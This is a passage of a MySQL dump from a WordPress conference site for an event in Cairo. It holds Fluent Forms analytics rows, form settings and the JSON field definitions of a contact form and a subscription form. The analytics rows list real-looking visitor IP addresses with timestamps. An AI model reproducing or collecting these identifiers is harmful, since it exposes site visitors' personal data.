(213,1,0,'','Windows','Chrome',NULL,NULL,'145.107.125.254',1,'2023-08-31 17:35:45'),
(214,1,0,'','Apple','Safari',NULL,NULL,'130.89.228.93',2,'2023-08-31 17:42:24'),
(215,1,0,'','Android','Chrome',NULL,NULL,'41.234.0.8',4,'2023-08-31 18:19:42'),
(216,1,0,'','Windows','Chrome',NULL,NULL,'165.246.31.189',1,'2023-08-31 18:32:55'),
(217,1,0,'','Linux','Chrome',NULL,NULL,'89.206.89.167',1,'2023-08-31 19:09:06'),
(218,1,0,'','Windows','Chrome',NULL,NULL,'216.234.144.41',1,'2023-08-31 21:08:15'),
(219,1,0,'','Windows','Chrome',NULL,NULL,'199.180.84.69',1,'2023-08-31 21:08:46'),
(220,1,0,'','Windows','Chrome',NULL,NULL,'46.251.117.127',1,'2023-09-01 00:15:04'),
(221,1,0,'','Windows','Chrome',NULL,NULL,'153.96.19.25',1,'2023-09-01 01:47:33'),
(222,1,0,'','Windows','Chrome',NULL,NULL,'31.46.253.64',1,'2023-09-01 02:32:00'),
(223,1,0,'','Windows','Chrome',NULL,NULL,'46.232.121.98',1,'2023-09-01 11:16:30'),
(224,1,0,'','Windows','Chrome',NULL,NULL,'109.143.127.12',1,'2023-09-01 13:41:10'),
(225,1,0,'','iPhone','iPhone',NULL,NULL,'45.98.34.100',1,'2023-09-01 18:10:13'),
(226,1,0,'','Android','Chrome',NULL,NULL,'41.239.179.175',2,'2023-09-01 18:59:40'),
(227,1,0,'','unknown','Mozilla',NULL,NULL,'192.99.160.200',1,'2023-09-02 13:03:34'),
(228,1,0,'','iPhone','iPhone',NULL,NULL,'178.27.171.241',1,'2023-09-02 14:22:33'),
(229,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.138',1,'2023-09-02 15:17:05'),
(230,1,0,'http://baidu.com/','Android','Chrome',NULL,NULL,'27.115.124.45',1,'2023-09-02 17:40:40'),
(231,1,0,'','Android','Chrome',NULL,NULL,'185.16.164.7',1,'2023-09-02 17:45:15'),
(232,1,0,'','iPhone','Chrome',NULL,NULL,'154.135.143.110',1,'2023-09-02 19:35:05'),
(233,1,0,'','Android','Chrome',NULL,NULL,'45.240.33.10',1,'2023-09-02 20:47:46'),
(234,1,0,'','Windows','Chrome',NULL,NULL,'24.56.144.101',1,'2023-09-03 09:02:19'),
(235,1,0,'','Windows','Firefox',NULL,NULL,'103.144.1.163',3,'2023-09-03 15:03:20'),
(236,1,0,'','unknown','Mozilla',NULL,NULL,'85.208.96.209',1,'2023-09-06 22:57:30'),
(237,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.17',1,'2023-09-07 15:07:18'),
(238,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.198',1,'2023-09-09 15:08:37'),
(239,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.19',1,'2023-09-09 23:51:56'),
(240,1,0,'','unknown','unknown',NULL,NULL,'23.248.199.130',1,'2023-09-10 22:25:06'),
(241,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.225',1,'2023-09-11 15:07:33'),
(242,1,0,'','Windows','Chrome',NULL,NULL,'130.92.202.130',1,'2023-09-11 16:15:11'),
(243,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.25',1,'2023-09-13 16:39:55'),
(244,1,0,'https://mail.qq.com/','Windows','Chrome',NULL,NULL,'36.112.108.190',1,'2023-09-15 07:20:28'),
(245,1,0,'','unknown','Mozilla',NULL,NULL,'136.243.220.212',1,'2023-09-15 17:55:51'),
(246,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.239',1,'2023-09-16 07:39:15'),
(247,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.243',1,'2023-09-18 07:52:05'),
(248,1,0,'','Windows','Chrome',NULL,NULL,'140.110.222.1',1,'2023-09-18 12:13:54'),
(249,1,0,'','unknown','Mozilla',NULL,NULL,'185.191.171.16',1,'2023-09-19 23:08:17'),
(250,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.15',2,'2023-09-20 07:52:29'),
(251,1,0,'','unknown','unknown',NULL,NULL,'146.56.213.163',1,'2023-09-20 17:11:48'),
(252,1,0,'','Windows','Firefox',NULL,NULL,'103.194.187.146',3,'2023-09-20 21:59:01'),
(253,1,0,'','Windows','Firefox',NULL,NULL,'47.95.2.168',10,'2023-09-21 17:09:41'),
(254,1,0,'','Windows','Firefox',NULL,NULL,'119.42.148.122',19,'2023-09-22 04:10:48'),
(255,1,0,'','Windows','Firefox',NULL,NULL,'109.248.20.52',2,'2023-09-22 22:36:50'),
(256,1,0,'','unknown','unknown',NULL,NULL,'103.68.61.169',2,'2023-09-24 00:06:55'),
(257,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.163',1,'2023-09-25 13:14:00'),
(258,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.191',1,'2023-09-26 03:11:28'),
(259,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.190',2,'2023-09-27 19:13:40'),
(260,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.178',2,'2023-09-28 07:07:07'),
(261,1,0,'','unknown','Mozilla',NULL,NULL,'185.191.171.17',1,'2023-09-29 23:22:27'),
(262,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.234',1,'2023-09-30 14:15:12'),
(263,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.210',1,'2023-09-30 21:48:14'),
(264,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.63',1,'2023-10-01 11:25:07'),
(265,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.12',1,'2023-10-01 13:00:33'),
(266,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.9',2,'2023-10-02 02:35:28'),
(267,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.156',1,'2023-10-02 11:54:01'),
(268,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.48',1,'2023-10-02 13:52:59'),
(269,1,0,'','unknown','unknown',NULL,NULL,'61.136.164.77',3,'2023-10-02 14:42:34'),
(270,1,0,'','unknown','unknown',NULL,NULL,'143.92.43.152',1,'2023-10-03 01:49:32'),
(271,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.201',1,'2023-10-03 02:19:39'),
(272,1,0,'','Windows','Firefox',NULL,NULL,'123.56.46.72',9,'2023-10-04 20:08:41'),
(273,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.17',1,'2023-10-05 01:02:24'),
(274,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.75',1,'2023-10-05 08:25:26'),
(275,1,0,'http://gsw2023.com/index.php?m=api&c=app&a=getPlatformConfig','Android','Chrome',NULL,NULL,'101.36.116.74',1,'2023-10-05 13:02:13'),
(276,1,0,'','unknown','Chrome',NULL,NULL,'157.55.39.203',1,'2023-10-05 20:07:37'),
(277,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.231',1,'2023-10-06 12:06:05'),
(278,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.145',1,'2023-10-07 02:15:27'),
(279,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.229',1,'2023-10-07 10:42:36'),
(280,1,0,'','unknown','unknown',NULL,NULL,'154.213.65.11',1,'2023-10-08 14:40:41'),
(281,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.155',1,'2023-10-08 21:36:12'),
(282,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.55',1,'2023-10-09 04:49:03'),
(283,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.20',1,'2023-10-10 08:49:12'),
(284,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.181',1,'2023-10-10 11:46:10'),
(285,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.168',3,'2023-10-11 05:55:47'),
(286,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.92',1,'2023-10-11 16:56:38'),
(287,1,0,'http://gsw2023.com/index.php?m=api&c=app&a=getPlatformConfig','Android','Chrome',NULL,NULL,'165.154.66.9',1,'2023-10-12 08:38:18'),
(288,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.32',1,'2023-10-13 16:03:21'),
(289,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.136',1,'2023-10-14 05:38:51'),
(290,1,0,'','unknown','Mozilla',NULL,NULL,'185.191.171.4',2,'2023-10-15 21:40:54'),
(291,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.212',1,'2023-10-15 23:54:32'),
(292,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.6',1,'2023-10-17 08:41:14'),
(293,1,0,'http://www.gsw2023.com/index.php?m=vod-search','Windows','Internet Explorer',NULL,NULL,'103.97.128.103',1,'2023-10-18 04:57:47'),
(294,1,0,'http://www.gsw2023.com/index.php?m=member&c=index&a=register&siteid=1','Windows','Internet Explorer',NULL,NULL,'103.97.128.103',1,'2023-10-18 04:58:22'),
(295,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.170',1,'2023-10-19 05:19:23'),
(296,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.142',1,'2023-10-19 06:44:13'),
(297,1,0,'','unknown','Chrome',NULL,NULL,'207.46.13.125',1,'2023-10-21 23:38:30'),
(298,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.43',1,'2023-10-22 21:16:53'),
(299,1,0,'http://gsw2023.com/index.php?m=api&c=app&a=getPlatformConfig','Android','Chrome',NULL,NULL,'152.32.211.248',1,'2023-10-24 07:27:37'),
(300,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.50',1,'2023-10-24 08:47:06');
/*!40000 ALTER TABLE `dnctiavkr_fluentform_form_analytics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fluentform_form_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_fluentform_form_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fluentform_form_meta` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(10) unsigned DEFAULT NULL,
  `meta_key` varchar(255) NOT NULL,
  `value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fluentform_form_meta`
--

LOCK TABLES `dnctiavkr_fluentform_form_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fluentform_form_meta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_fluentform_form_meta` VALUES
(1,1,'template_name','basic_contact_form'),
(2,1,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"<p>Thanks &amp; see you in Cairo.<\\/p>\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"selectedDays\":[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"],\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\",\"asteriskPlacement\":\"asterisk-right\"},\"delete_entry_on_submission\":\"no\",\"appendSurveyResult\":{\"enabled\":false,\"showLabel\":false,\"showCount\":false}}'),
(3,1,'advancedValidationSettings','{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":\"\",\"operator\":\"=\",\"value\":\"\"}],\"error_message\":\"\",\"validation_type\":\"fail_on_condition_met\"}'),
(4,1,'double_optin_settings','{\"status\":\"no\",\"confirmation_message\":\"Please check your email inbox to confirm this submission\",\"email_body_type\":\"global\",\"email_subject\":\"Please confirm your form submission\",\"email_body\":\"<h2>Please Confirm Your Submission</h2><p>&nbsp;</p><p style=\"text-align: center;\"><a style=\"color: #ffffff; background-color: #454545; font-size: 16px; border-radius: 5px; text-decoration: none; font-weight: normal; font-style: normal; padding: 0.8rem 1rem; border-color: #0072ff;\" href=\"#confirmation_url#\">Confirm Submission</a></p><p>&nbsp;</p><p>If you received this email by mistake, simply delete it. Your form submission won\'t proceed if you don\'t click the confirmation link above.</p>\",\"email_field\":\"\",\"skip_if_logged_in\":\"yes\",\"skip_if_fc_subscribed\":\"no\"}'),
(5,2,'template_name','inline_subscription'),
(6,2,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"asteriskPlacement\":\"asterisk-right\"}}'),
(7,2,'notifications','{\"name\":\"Admin Notification Email\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":\"email\",\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"[{inputs.names}] New Form Submission\",\"message\":\"<p>{all_data}<\\/p> <p>This form submitted at: {embed_post.permalink}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\"}'),
(8,2,'step_data_persistency_status','no'),
(9,2,'_primary_email_field','email'),
(10,1,'_primary_email_field','email'),
(11,1,'_total_views','300');
/*!40000 ALTER TABLE `dnctiavkr_fluentform_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fluentform_forms`
--

DROP TABLE IF EXISTS `dnctiavkr_fluentform_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fluentform_forms` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `status` varchar(45) DEFAULT 'Draft',
  `appearance_settings` text DEFAULT NULL,
  `form_fields` longtext DEFAULT NULL,
  `has_payment` tinyint(1) NOT NULL DEFAULT 0,
  `type` varchar(45) DEFAULT NULL,
  `conditions` text DEFAULT NULL,
  `created_by` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fluentform_forms`
--

LOCK TABLES `dnctiavkr_fluentform_forms` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fluentform_forms` DISABLE KEYS */;
INSERT INTO `dnctiavkr_fluentform_forms` VALUES
(1,'Contact Form Demo','published',NULL,'{\"fields\":[{\"index\":8,\"element\":\"input_radio\",\"attributes\":{\"type\":\"radio\",\"name\":\"input_radio\",\"value\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"container_class\":\"\",\"label\":\"Title\",\"admin_field_label\":\"Title\",\"label_placement\":\"\",\"display_type\":\"\",\"help_message\":\"\",\"randomize_options\":\"no\",\"advanced_options\":[{\"label\":\"Miss.\",\"value\":\"Miss.\",\"calc_value\":\"\",\"image\":\"\",\"id\":0},{\"label\":\"Ms.\",\"value\":\"Ms.\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"Mr.\",\"value\":\"Mr.\",\"calc_value\":\"\",\"image\":\"\",\"id\":2},{\"label\":\"Eng.\",\"value\":\"Eng.\",\"calc_value\":\"\",\"image\":\"\",\"id\":3},{\"label\":\"Dr.\",\"value\":\"Dr.\",\"calc_value\":\"\",\"image\":\"\",\"id\":4},{\"label\":\"Prof.\",\"value\":\"Prof.\",\"calc_value\":\"\",\"image\":\"\",\"id\":5}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[],\"layout_class\":\"\"},\"editor_options\":{\"title\":\"Radio Field\",\"icon_class\":\"ff-edit-radio\",\"element\":\"input-radio\",\"template\":\"inputCheckable\"},\"uniqElKey\":\"el_1692747854042\"},{\"index\":0,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"Name\",\"conditional_logics\":[],\"label_placement\":\"\"},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"First Name\"},\"settings\":{\"container_class\":\"\",\"label\":\"First Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Middle Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Last Name\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"ff-edit-name\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1570866006692\"},{\"index\":5,\"element\":\"select_country\",\"attributes\":{\"name\":\"country-list\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Select Country\"},\"settings\":{\"container_class\":\"\",\"label\":\"Nationality\",\"admin_field_label\":\"Nationality\",\"label_placement\":\"\",\"help_message\":\"\",\"enable_select_2\":\"yes\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"country_list\":{\"active_list\":\"all\",\"visible_list\":[],\"hidden_list\":[]},\"conditional_logics\":[]},\"options\":{\"US\":\"United States of America\"},\"editor_options\":{\"title\":\"Country List\",\"element\":\"country-list\",\"icon_class\":\"ff-edit-country\",\"template\":\"selectCountry\"},\"uniqElKey\":\"el_1692785542769\"},{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"subject_2\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Subject\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Affiliation\",\"label_placement\":\"\",\"admin_field_label\":\"Affiliation\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"is_unique\":\"no\",\"unique_validation_message\":\"This field value need to be unique.\",\"prefix_label\":\"\",\"suffix_label\":\"\"},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_16927480684820.36013893071169445\"},{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"input_text\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Phone\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Phone\",\"label_placement\":\"\",\"admin_field_label\":\"Phone\",\"help_message\":\"\",\"prefix_label\":\"\",\"suffix_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"This value need to be unique.\"},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1692750144907\"},{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\",\"prefix_label\":\"\",\"suffix_label\":\"\"},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1692750253678\"},{\"index\":6,\"element\":\"input_number\",\"attributes\":{\"type\":\"number\",\"name\":\"numeric-field\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"ID on Conftool\"},\"settings\":{\"container_class\":\"\",\"label\":\"ID on Conftool\",\"admin_field_label\":\"ID on Conftool\",\"label_placement\":\"\",\"help_message\":\"\",\"number_step\":\"\",\"prefix_label\":\"\",\"suffix_label\":\"\",\"numeric_formatter\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"numeric\":{\"value\":true,\"message\":\"This field must contain numeric value\"},\"min\":{\"value\":\"4\",\"message\":\"4 numbers\"},\"max\":{\"value\":\"\",\"message\":\"Maximum value is \"},\"digits\":{\"value\":\"\",\"message\":\"The number of digits has to be \"}},\"conditional_logics\":[],\"calculation_settings\":{\"status\":false,\"formula\":\"\"}},\"editor_options\":{\"title\":\"Numeric Field\",\"icon_class\":\"ff-edit-numeric\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1692748154259\"},{\"index\":2,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"subject_1\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Hotel accommodation in Cairo\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Hotel accommodation in Cairo\",\"label_placement\":\"\",\"admin_field_label\":\"Hotel accommodation in Cairo\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"is_unique\":\"no\",\"unique_validation_message\":\"This field value need to be unique.\",\"prefix_label\":\"\",\"suffix_label\":\"\"},\"editor_options\":{\"title\":\"Simple Text\",\"icon_class\":\"ff-edit-text\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1692750250699\"},{\"index\":13,\"element\":\"input_date\",\"attributes\":{\"type\":\"text\",\"name\":\"Check_in_Date\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Check-in Date\"},\"settings\":{\"container_class\":\"\",\"label\":\"Check-in Date \",\"admin_field_label\":\"Check-in Date\",\"label_placement\":\"\",\"date_config\":\"\",\"date_format\":\"d/m/Y\",\"help_message\":\"\",\"is_time_enabled\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Time & Date\",\"icon_class\":\"ff-edit-date\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1692748346309\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"description\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your favorite type of food \",\"rows\":3,\"cols\":2,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Your favorite type of food \",\"admin_field_label\":\"Your favorite type of food \",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"ff-edit-textarea\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1692785769927\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"message\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your Message\",\"rows\":4,\"cols\":2,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\" Message to Gsw2023 \",\"admin_field_label\":\"\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"ff-edit-textarea\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1692748405692\"},{\"index\":13,\"element\":\"input_date\",\"attributes\":{\"type\":\"text\",\"name\":\"datetime\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\" Date of Birth (optinal)\"},\"settings\":{\"container_class\":\"\",\"label\":\" Date of Birth (optinal)\",\"admin_field_label\":\" Date of Birth (optinal)\",\"label_placement\":\"\",\"date_config\":\"\",\"date_format\":\"d/m/Y\",\"help_message\":\"\",\"is_time_enabled\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Time & Date\",\"icon_class\":\"ff-edit-date\",\"template\":\"inputText\"},\"uniqElKey\":\"el_16927483881610.022993175496347718\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#409EFF\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Form\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'',NULL,1,'2022-11-12 19:06:09','2023-08-23 14:17:25'),
(2,'Subscription Form','published',NULL,'{\"fields\":[{\"index\":1,\"element\":\"container\",\"attributes\":[],\"settings\":{\"container_class\":\"\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"columns\":[{\"fields\":[{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Your Email Address\"},\"settings\":{\"container_class\":\"\",\"label\":\"\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"Email\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\"},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"ff-edit-email\",\"template\":\"inputText\"},\"uniqElKey\":\"el_16231279686950.8779857923682932\"}]},{\"fields\":[{\"index\":15,\"element\":\"custom_submit_button\",\"attributes\":{\"class\":\"\",\"type\":\"submit\"},\"settings\":{\"button_style\":\"\",\"button_size\":\"md\",\"align\":\"left\",\"container_class\":\"\",\"current_state\":\"normal_styles\",\"background_color\":\"\",\"color\":\"\",\"hover_styles\":{\"backgroundColor\":\"#ffffff\",\"borderColor\":\"#409EFF\",\"color\":\"#409EFF\",\"borderRadius\":\"\",\"minWidth\":\"100%\"},\"normal_styles\":{\"backgroundColor\":\"#409EFF\",\"borderColor\":\"#409EFF\",\"color\":\"#ffffff\",\"borderRadius\":\"\",\"minWidth\":\"100%\"},\"button_ui\":{\"text\":\"Subscribe\",\"type\":\"default\",\"img_url\":\"\"},\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]}},\"editor_options\":{\"title\":\"Custom Submit Button\",\"icon_class\":\"dashicons 